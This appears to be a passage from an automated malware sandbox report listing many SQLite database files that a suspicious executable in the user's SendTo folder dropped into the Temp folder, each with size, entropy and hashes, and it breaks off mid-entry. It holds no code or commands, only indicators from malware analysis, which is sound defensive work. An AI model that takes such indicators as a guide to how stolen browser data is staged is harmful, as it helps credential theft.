                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\rrLoHktKSq

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\rzf4LHulnf

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\sFJ38zzT41

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\sMpX30z8nf

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\sbCxCMNVEx

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\sg7eWV9c9q

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\svJUXQi1ky

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\swWu7GQPWr

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\tLH0kI3Umz

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\ti7z2v57mS

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\tx2gaq73hj

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\u1YuqatjPt

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\uCoj8KNCas

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\udu8OxO7xV

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\usTQWO3oDV

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\v417FerGZc

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\vJLV2pkahx

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\vYFOf12oq4

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\viOyRYnl3k

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\vtOQrML8gS

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\wKDyNHiNf6

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\wSLzrXS7K2

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\wXjbnjxJgX

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\x34EKnXcRh

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
